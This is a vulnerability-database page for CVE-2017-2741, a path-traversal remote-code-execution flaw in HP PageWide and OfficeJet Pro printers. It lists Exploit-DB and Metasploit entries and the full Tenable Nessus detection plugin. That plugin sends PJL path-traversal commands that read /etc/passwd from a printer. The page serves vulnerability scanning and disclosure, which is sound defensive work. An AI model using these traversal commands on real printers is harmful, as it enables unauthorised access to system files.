Vulnerabilities > CVE-2017-2741 - Unspecified vulnerability in HP products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
hp
critical
nessus
exploit available
metasploit
NVD
Published: 2018-01-23
Updated: 2019-10-03

Summary

A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code.

Vulnerable Configurations

Part Description Count
OS
Hp
63
Hardware
Hp
38

Exploit-Db

  • descriptionHP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit). CVE-2017-2741. Remote exploit for Unix platform. Tags: Metasploit Framework (MSF), Remote
    fileexploits/unix/remote/45273.rb
    idEDB-ID:45273
    last seen2018-10-07
    modified2018-08-27
    platformunix
    port
    published2018-08-27
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/45273/
    titleHP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)
    typeremote
  • descriptionHP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution. CVE-2017-2741. Remote exploit for Hardware platform
    fileexploits/hardware/remote/42176.py
    idEDB-ID:42176
    last seen2017-06-15
    modified2017-06-14
    platformhardware
    port9100
    published2017-06-14
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/42176/
    titleHP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
    typeremote

Metasploit

descriptionThe module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. Impacted printers: HP PageWide Managed MFP P57750dw HP PageWide Managed P55250dw HP PageWide Pro MFP 577z HP PageWide Pro 552dw HP PageWide Pro MFP 577dw HP PageWide Pro MFP 477dw HP PageWide Pro 452dw HP PageWide Pro MFP 477dn HP PageWide Pro 452dn HP PageWide MFP 377dw HP PageWide 352dw HP OfficeJet Pro 8730 All-in-One Printer HP OfficeJet Pro 8740 All-in-One Printer HP OfficeJet Pro 8210 Printer HP OfficeJet Pro 8216 Printer HP OfficeJet Pro 8218 Printer Please read the module documentation regarding the possibility for leaving an unauthenticated telnetd service running as a side effect of this exploit.
idMSF:EXPLOIT/LINUX/MISC/HP_JETDIRECT_PATH_TRAVERSAL
last seen2020-06-02
modified2018-08-23
published2017-12-29
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/hp_jetdirect_path_traversal.rb
titleHP Jetdirect Path Traversal Arbitrary Code Execution

Nessus

NASL familyGeneral
NASL idHP_PRINTER_RCE.NASL
descriptionThe remote HP OfficeJet Pro or PageWide Pro printer is affected by an unspecified flaw in the Printer Job Language (PJL) interface, within various PJL and PostScript file handling functions, due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this, via directory traversal, to write arbitrary files, resulting in the execution of arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id100461
published2017-05-26
reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/100461
titleHP OfficeJet Pro and PageWide Pro PJL Interface Directory Traversal RCE
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(100461);
  script_version("1.8");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2017-2741");
  script_xref(name:"HP", value:"HPSBPI03555");
  script_xref(name:"HP", value:"c05462914");

  script_name(english:"HP OfficeJet Pro and PageWide Pro PJL Interface Directory Traversal RCE");
  script_summary(english:"Attempts to read /etc/passwd.");

  script_set_attribute(attribute:"synopsis", value:
"The remote device is affected by a remote code execution
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote HP OfficeJet Pro or PageWide Pro printer is affected by an
unspecified flaw in the Printer Job Language (PJL) interface, within
various PJL and PostScript file handling functions, due to improper
sanitization of user-supplied input. An unauthenticated, remote
attacker can exploit this, via directory traversal, to write arbitrary
files, resulting in the execution of arbitrary code.");
  script_set_attribute(attribute:"see_also", value:"https://support.hp.com/lv-en/document/c05462914");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate firmware update according to the vendor
advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-2741");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'HP Jetdirect Path Traversal Arbitrary Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/04/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/26");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/h:hp:officejet_pro");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/h:hp:pagewide_pro");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("pjl_detect.nasl");
  script_require_keys("devices/hp_printer");
  script_require_ports("Services/jetdirect", 9100);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc:"jetdirect", default:9100, exit_on_fail:TRUE);
device = get_kb_item_or_exit('jetdirect/' + port + '/info');
if ('HP OfficeJet' >!< device && 'HP PageWide' >!< device)
{
  audit(AUDIT_HOST_NOT, "an affected HP printer");
}

soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_SOCK_FAIL, port, "TCP");

# Check if we can read etc passwd
pjl_cmd = '@PJL FSQUERY NAME="../../etc/passwd"\r\n';
send(socket:soc, data:pjl_cmd);

# Receive the status of the file
resp = recv(socket:soc, length:1024);
if (isnull(resp)) audit(AUDIT_RESP_NOT, port, "the FSQUERY request");

# Check to see if the directory traversal works
if ("TYPE=FILE SIZE=" >!< resp) audit(AUDIT_HOST_NOT, "an affected HP printer");

# Get the size of the file
match = pregmatch(pattern:'TYPE=FILE SIZE=([0-9]+)', string:resp);
if (isnull(match)) audit(AUDIT_RESP_BAD, port, "the FSQUERY request");

pjl_cmd = '@PJL FSUPLOAD NAME="../../etc/passwd" OFFSET=0 SIZE=' + match[1] + '\r\n';
send(socket:soc, data:pjl_cmd);

resp = recv(socket:soc, length:1024);
close(soc);

# verify the response is as expected
if (isnull(resp) || "FSUPLOAD" >!< resp || "/bin/sh" >!< resp)
{
  audit(AUDIT_RESP_BAD, port, "the FSUPLOAD request");
}

# trim off the first line since its the echo of the FSUPLOAD
etc_start = stridx(resp, '\r\n');
resp = substr(resp, etc_start + 2);

security_report_v4(
  port:port,
  severity:SECURITY_HOLE,
  file:'/etc/passwd',
  output:resp,
  request:make_list(pjl_cmd));

Packetstorm

References